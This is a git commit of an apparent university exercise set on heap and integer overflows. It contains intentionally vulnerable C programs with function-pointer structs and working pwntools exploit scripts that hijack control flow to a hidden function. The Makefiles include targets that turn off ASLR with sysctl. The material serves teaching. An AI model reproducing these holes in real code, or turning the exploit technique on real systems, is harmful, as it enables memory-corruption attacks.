initial commit

2025-05-22 10:44:24 +02:00 · 2025-05-22 10:44:24 +02:00 · 66b90de8fe
commit 66b90de8fe
16 changed files with 667 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1,2 @@
+venv/
+.ropeproject/
--- a/ex03/heap_overflows/Makefile
+++ b/ex03/heap_overflows/Makefile
@ -0,0 +1,24 @@
+CC=gcc
+CFLAGS= -std=gnu99 -D_GNU_SOURCE
+#CFLAGS= -pie -fPIE -std=gnu99 -D_GNU_SOURCE
+OBJ = heap.o
+RM = rm -rf
+TARGETS = heap
+ASLR_ON=/usr/bin/sudo /sbin/sysctl -w kernel.randomize_va_space=2
+ASLR_OFF=/usr/bin/sudo /sbin/sysctl -w kernel.randomize_va_space=0
+
+all: $(TARGETS)
+
+.c.o:
+	$(CC) $(CFLAGS) -c $<
+
+aslr_on:
+	$(ASLR_ON)
+
+aslr_off:
+	$(ASLR_OFF)
+
+clean:
+	$(RM) $(OBJ) $(TARGETS)
+
+.PHONY: all clean
--- a/ex03/heap_overflows/attack.py
+++ b/ex03/heap_overflows/attack.py
@ -0,0 +1,10 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./heap').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+arg = b'}' * 24 + p64(secret_addr).rstrip(b'\x00')
+
+subprocess.run(['./heap', arg])
--- a/ex03/heap_overflows/heap.c
+++ b/ex03/heap_overflows/heap.c
@ -0,0 +1,93 @@
+#include <errno.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+  char name[16];
+  bool root;
+  void (*welcome)(void);
+} creds_t;
+
+static creds_t *creds;
+
+/* internal prototypes */
+static void login(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+int main(int argc, char **argv) {
+  if (argc < 2) {
+    printf("usage: %s <name>\n", argv[0]);
+    return -1;
+  }
+
+  creds = (creds_t *)calloc(1, sizeof(creds_t));
+  if (!creds) {
+    perror("calloc");
+    return -1;
+  }
+
+  // Super duper cooler patch
+  if (strlen(argv[1]) >= 16) {
+      printf("\"%s\" is way too long, I'll give you a KISS\n", argv[1]);
+      return -1;
+  }
+
+  // XXX
+#if 0
+	printf("creds = %#lx\n", (uint64_t) creds);
+	printf("creds->name = %#lx\n", (uint64_t) &creds->name);
+	printf("creds->root = %#lx\n", (uint64_t) &creds->root);
+	printf("creds->welcome = %#lx\n", (uint64_t) &creds->welcome);
+	printf("login = %#lx\n", (uint64_t) login);
+	printf("s3cr3t = %#lx\n", (uint64_t) s3cr3t);
+#endif
+  // XXX
+
+  creds->welcome = login;
+  creds->root = false;
+  strcpy(creds->name, argv[1]); // Schwachstelle diese hier
+  creds->welcome();
+  free(creds);
+  return 0;
+}
+
+/* internal function definitions */
+static void login(void) {
+  printf("Hello %s, you have %s root privileges.\n", creds->name,
+         ((creds->root) ? "gained" : "no"));
+}
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
+
+// aslr_off: Addressraum nicht mehr randomisiert
+//
+// root: ./heap oarsch_7777777777
+//
+// absturz: ./heap oarsch_77777777778888888
+//
+// s3cr3t: ./heap oarsch_77777777778888888
+//
+// ./heap oarsch_77777777778888888mSUUUU (0x55555555536d = mSUUUU)
+//
+// bei #if 0 funzt der Angriffsvektor natuerlich nimmer, weil code von s3cr3t verschoben
+// (Instruktionen fehlen ja jetzat)
+//
+// from pwn import *
+// import subprocess
+//
+// context(arch='amd64', os='linux', log_level='info')
+//
+// secret_addr = ELF('./heap').symbols['s3cr3t']
+// secret_addr = secret_addr - 0x1000 + 0x555555555000
+// arg = b'}' * 24 + p64(secret_addr).rstrip(b'\x00')
+//
+// subprocess.run(['./heap', arg])
+//
+//
--- a/ex03/int_overflows/Makefile
+++ b/ex03/int_overflows/Makefile
@ -0,0 +1,15 @@
+CC=gcc
+CFLAGS= -std=gnu99 -D_GNU_SOURCE
+OBJ = int01.o int03.o
+RM = rm -rf
+TARGETS = int01 int03
+
+all: $(TARGETS)
+
+.c.o:
+	$(CC) $(CFLAGS) -c $<
+
+clean:
+	$(RM) $(OBJ) $(TARGETS)
+
+.PHONY: all clean
--- a/ex03/int_overflows/int01.c
+++ b/ex03/int_overflows/int01.c
@ -0,0 +1,115 @@
+/* includes */
+#include <errno.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+/* internal prototypes */
+static void a(void);
+
+static void b(const char *str);
+
+static void c(void);
+
+int main(int argc, char **argv) {
+  a();
+  if (argc > 1) {
+    b(argv[1]);
+  } else {
+    printf("\nAufgabe b)\nTODO: Uebergeben Sie eine Zahl auf der Kommandozeile "
+           "um Funktion b() auszufuehren.\n");
+  }
+  c();
+  return 0;
+}
+
+/* internal function definitions */
+static void a(void) {
+  /* displays the size and ranges of the fixed size integer types */
+  printf("\nAufgabe a)\n");
+
+  int8_t i8_min = 0x80;
+  int8_t i8_max = 0x7f;
+
+  uint8_t u8_min = 0;
+  uint8_t u8_max = 0xff;
+
+  int16_t i16_min = 0x8000;
+  int16_t i16_max = 0x7fff;
+
+  uint16_t u16_min = 0;
+  uint16_t u16_max = 0xffff;
+
+  int32_t i32_min = 0x80000000;
+  int32_t i32_max = 0x7fffffff;
+
+  uint32_t u32_min = 0;
+  uint32_t u32_max = 0xffffffff;
+
+  int64_t i64_min = 0x8000000000000000;
+  int64_t i64_max = 0x7fffffffffffffff;
+
+  uint64_t u64_min = 0;
+  uint64_t u64_max = 0xffffffffffffffff;
+
+  printf("i8_min: %hhd, i8_max: %hhd\n", i8_min, i8_max);
+  printf("u8_min: %hhu, u8_max: %hhu\n", u8_min, u8_max);
+  printf("i16_min: %hd, i16_max: %hd\n", i16_min, i16_max);
+  printf("u16_min: %hu, u16_max: %hu\n", u16_min, u16_max);
+  printf("i32_min: %d, i32_max: %d\n", i32_min, i32_max);
+  printf("u32_min: %u, u32_max: %u\n", u32_min, u32_max);
+  printf("i64_min: %ld, i64_max: %ld\n", i64_min, i64_max);
+  printf("u64_min: %lu, u64_max: %lu\n", u64_min, u64_max);
+}
+
+// gib einfach 2147483648
+static void b(const char *str) {
+  /* No compiler warnings anymore */
+  printf("\nAufgabe b)\n");
+  char *endptr;
+  errno = 0;
+  int32_t s32 = (int32_t)strtol(str, &endptr, 10);
+  if (errno || *endptr) {
+    fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+  } else {
+    printf("s32 = %d\n", s32);
+  }
+}
+
+static void c(void) {
+  /* gcc generates compiler warnings (-Woverflow) */
+  printf("\nAufgabe c)\n");
+
+  const int8_t target = 42;
+
+  uint8_t u8 = 122;
+  int8_t s8 = 100;
+  uint16_t u16 = 1567;
+  int16_t s16 = 3000;
+  uint32_t u32 = 5049039;
+  int32_t s32 = 93049309;
+  uint64_t u64 = 90394039403;
+  int64_t s64 = 59848904909;
+
+  uint8_t u8_comp = target + 255 - u8 + 1;
+  uint16_t u16_comp = target + 65535 - u16 + 1;
+  uint32_t u32_comp = target + 4294967295 - u32 + 1;
+  uint64_t u64_comp = target + 18446744073709551615 - u64 + 1;
+
+  int8_t s8_comp = target + 255 - ((uint8_t) s8) + 1;
+  int16_t s16_comp = target + 65535 - ((uint16_t) s16) + 1;
+  int32_t s32_comp = target + 4294967295 - ((uint32_t) s32) + 1;
+  int64_t s64_comp = target + 18446744073709551615 - ((uint64_t) s64) + 1;
+
+  printf("u8: %hhu\n", u8 + u8_comp);
+  printf("u16: %hu\n", u16 + u16_comp);
+  printf("u32: %u\n", u32 + u32_comp);
+  printf("u64: %lu\n", u64 + u64_comp);
+
+  printf("s8: %hhd\n", s8 + s8_comp);
+  printf("s16: %hd\n", s16 + s16_comp);
+  printf("s32: %d\n", s32 + s32_comp);
+  printf("s64: %ld\n", s64 + s64_comp);
+}
+
+// int02: s8, s16, u32
--- a/ex03/int_overflows/int03.c
+++ b/ex03/int_overflows/int03.c
@ -0,0 +1,74 @@
+/* includes */
+#include <errno.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+/* internal protoypes */
+static void print(void);
+
+static void insert(const char *name, uint32_t index);
+
+typedef struct cred {
+  char name[16];
+} cred_t;
+
+static cred_t creds[8];
+
+#define ADMIN "root"
+
+// ./int03 huan 4294967296
+
+/* entry point */
+int main(int argc, char **argv) {
+  if (argc < 3) {
+    printf("usage: %s <name> <index>\n", argv[0]);
+    return -1;
+  }
+  char *endptr;
+  errno = 0;
+  uint32_t index = (uint32_t)strtoull(argv[2], &endptr, 10);
+  if (errno || *endptr) {
+    fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+    exit(EXIT_FAILURE);
+  }
+
+  snprintf(creds[0].name, 16, "%s", ADMIN);
+  if (index == 0) {
+    fprintf(stderr, "ALERT: someone tried to overwrite admin account!\n");
+    exit(EXIT_FAILURE);
+  }
+
+  insert(argv[1], index);
+  print();
+  return 0;
+}
+
+/* internal function definitions */
+static void insert(const char *name, uint32_t index) {
+  if (index > 7) {
+    fprintf(stderr, "Invalid index\n");
+    exit(EXIT_FAILURE);
+  }
+  if (strlen(name) > 15) {
+    fprintf(stderr, "Name must not exceed 15 characters\n");
+    exit(EXIT_FAILURE);
+  }
+  snprintf(creds[index].name, 16, "%s", name);
+}
+
+static void print(void) {
+  for (int i = 0; i < 8; ++i) {
+    if (i == 0) {
+      printf("Admin: ");
+    } else {
+      printf("User: ");
+    }
+    if (strcmp(creds[i].name, "")) {
+      printf("%s\n", creds[i].name);
+    } else {
+      printf("unknown\n");
+    }
+  }
+}
--- a/ex03/mixed/Makefile
+++ b/ex03/mixed/Makefile
@ -0,0 +1,23 @@
+CC=gcc
+CFLAGS= -std=gnu99 -D_GNU_SOURCE
+OBJ = mixed01.o mixed02.o mixed03.o mixed04.o
+RM = rm -rf
+TARGETS = mixed01 mixed02 mixed03 mixed04
+ASLR_ON=/sbin/sysctl -w kernel.randomize_va_space=2
+ASLR_OFF=/sbin/sysctl -w kernel.randomize_va_space=0
+
+all: $(TARGETS)
+
+.c.o:
+	$(CC) $(CFLAGS) -c $<
+
+aslr_on:
+	$(ASLR_ON)
+
+aslr_off:
+	$(ASLR_OFF)
+
+clean:
+	$(RM) $(OBJ) $(TARGETS)
+
+.PHONY: all clean
--- a/ex03/mixed/mixed01.c
+++ b/ex03/mixed/mixed01.c
@ -0,0 +1,51 @@
+#include <errno.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+  char name[16];
+  void (*welcome)(void);
+} creds_t;
+
+static creds_t *creds;
+
+/* internal prototypes */
+static void login(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+// ./mixed01 aaaaaaaaaaaaaaaaa 65536
+int main(int argc, char **argv) {
+  if (argc < 3) {
+    printf("usage: %s <name> <length of name>\n", argv[0]);
+    return -1;
+  }
+  int32_t size = atoi(argv[2]);
+  uint16_t s = size;
+  creds = (creds_t *)calloc(1, sizeof(creds_t));
+  if (!creds) {
+    perror("calloc");
+    return -1;
+  }
+  if (s >= sizeof(creds->name)) {
+    fprintf(stderr, "length exceeds buffer size\n");
+    free(creds);
+    return -1;
+  }
+  creds->welcome = login;
+  snprintf(creds->name, size + 1, "%s", argv[1]);
+  creds->welcome();
+  free(creds);
+  return 0;
+}
+
+/* internal function definitions */
+static void login(void) { printf("Hello %s.\n", creds->name); }
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
--- a/ex03/mixed/mixed01.py
+++ b/ex03/mixed/mixed01.py
@ -0,0 +1,10 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed01').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+arg = b'}' * 16 + p64(secret_addr).rstrip(b'\x00')
+
+subprocess.run(['./mixed01', arg, '65536'])
--- a/ex03/mixed/mixed02.c
+++ b/ex03/mixed/mixed02.c
@ -0,0 +1,72 @@
+#include <errno.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define BUF_SIZE 128
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+  char str[BUF_SIZE];
+  void (*welcome)(void);
+} creds_t;
+static creds_t *creds;
+
+/* internal prototypes */
+static void cat(const char *s1, uint32_t len1, const char *s2, uint32_t len2);
+
+static void print(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+// ./mixed02 dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd 4294967295 d 10
+int main(int argc, char **argv) {
+  if (argc < 5) {
+    printf("usage: %s <string1> <length1> <string2> <length2>\n", argv[0]);
+    return -1;
+  }
+
+  char *endptr;
+  errno = 0;
+  uint32_t len1 = (uint32_t)strtoul(argv[2], &endptr, 10);
+  if (errno || *endptr) {
+    fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+    exit(EXIT_FAILURE);
+  }
+  errno = 0;
+  uint32_t len2 = (uint32_t)strtoul(argv[4], &endptr, 10);
+  if (errno || *endptr) {
+    fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+    exit(EXIT_FAILURE);
+  }
+
+  creds = (creds_t *)calloc(1, sizeof(creds_t));
+  if (!creds) {
+    perror("calloc");
+    return -1;
+  }
+  creds->welcome = print;
+  cat(argv[1], len1, argv[3], len2);
+  creds->welcome();
+  free(creds);
+  return 0;
+}
+
+/* internal function definitions */
+static void cat(const char *s1, uint32_t len1, const char *s2, uint32_t len2) {
+  if ((len1 + len2) >= BUF_SIZE) {
+    fprintf(stderr, "Input strings exceed buffer size\n");
+    exit(EXIT_FAILURE);
+  }
+  snprintf(creds->str, len1 + 1, "%s", s1);
+  // TODO: creds->str+len1+1
+  snprintf(creds->str + len1, len2 + 1, "%s", s2);
+}
+
+static void print(void) { printf("%s!\n", creds->str); }
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
--- a/ex03/mixed/mixed02.py
+++ b/ex03/mixed/mixed02.py
@ -0,0 +1,12 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed02').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+
+arg0 = b'}' * 127
+arg1 = b'}' + p64(secret_addr).rstrip(b'\x00')
+
+subprocess.run(['./mixed02', arg0, '127', arg1, '4294967294'])
--- a/ex03/mixed/mixed03.c
+++ b/ex03/mixed/mixed03.c
@ -0,0 +1,64 @@
+#include <errno.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define BUF_SIZE 128
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+  char str[BUF_SIZE];
+  void (*welcome)(void);
+} creds_t;
+static creds_t *creds;
+
+/* internal prototypes */
+static void copy(const char *s, int32_t len1);
+
+static void print(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+int main(int argc, char **argv) {
+  if (argc < 3) {
+    printf("usage: %s <string> <length>\n", argv[0]);
+    return -1;
+  }
+
+  char *endptr;
+  errno = 0;
+  int32_t len = (int32_t)strtol(argv[2], &endptr, 10);
+  if (errno || *endptr) {
+    fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+    exit(EXIT_FAILURE);
+  }
+
+  creds = (creds_t *)calloc(1, sizeof(creds_t));
+  if (!creds) {
+    perror("calloc");
+    return -1;
+  }
+
+  creds->welcome = print;
+  copy(argv[1], len);
+  creds->welcome();
+  free(creds);
+  return 0;
+}
+
+/* internal function definitions */
+static void copy(const char *s, int32_t len) {
+  if (len >= BUF_SIZE) {
+    fprintf(stderr, "string length exceeds buffer size\n");
+    exit(EXIT_FAILURE);
+  }
+  snprintf(creds->str, len + 1, "%s", s);
+}
+
+static void print(void) { printf("%s\n", creds->str); }
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
--- a/ex03/mixed/mixed03.py
+++ b/ex03/mixed/mixed03.py
@ -0,0 +1,12 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed03').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+
+arg = b'}' * 128 + p64(secret_addr).rstrip(b'\x00') + b'{'
+print(arg)
+
+subprocess.run(['./mixed03', arg, '-2'])
--- a/ex03/mixed/mixed04.c
+++ b/ex03/mixed/mixed04.c
@ -0,0 +1,81 @@
+#include <errno.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define NUM_ELEMENTS 8
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+  void (*welcome)(void);
+  uint64_t buffer[NUM_ELEMENTS];
+} creds_t;
+static creds_t *creds;
+
+/* internal prototypes */
+static void insert(uint64_t value, int64_t index);
+
+static void print(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+int main(int argc, char **argv) {
+  if (argc < 3) {
+    printf("usage: %s <hex value> <index>\n", argv[0]);
+    return -1;
+  }
+
+  char *endptr;
+  errno = 0;
+  uint64_t value = (uint64_t)strtoull(argv[1], &endptr, 16);
+  if (errno || *endptr) {
+    fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+    exit(EXIT_FAILURE);
+  }
+
+  errno = 0;
+  uint64_t index = (uint64_t)strtoull(argv[2], &endptr, 10);
+  if (errno || *endptr) {
+    fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+    exit(EXIT_FAILURE);
+  }
+
+  if (index < 0) {
+    fprintf(stderr, "Negative index\n");
+    exit(EXIT_FAILURE);
+  }
+
+  creds = (creds_t *)calloc(1, sizeof(creds_t));
+  if (!creds) {
+    perror("calloc");
+    return -1;
+  }
+
+  creds->welcome = print;
+  insert(value, index);
+  creds->welcome();
+  free(creds);
+  return 0;
+}
+
+/* internal function definitions */
+static void insert(uint64_t value, int64_t index) {
+  if (index >= NUM_ELEMENTS) {
+    fprintf(stderr, "Invalid index!\n");
+    exit(EXIT_FAILURE);
+  }
+
+  creds->buffer[index] = value;
+}
+
+static void print(void) {
+  for (int i = 0; i < NUM_ELEMENTS; ++i) {
+    printf("Index %d: %#lx\n", i, creds->buffer[i]);
+  }
+}
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
--- a/ex03/mixed/mixed04.py
+++ b/ex03/mixed/mixed04.py
@ -0,0 +1,9 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed04').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+
+subprocess.run(['./mixed04', hex(secret_addr), str(2 ** 64 - 1)])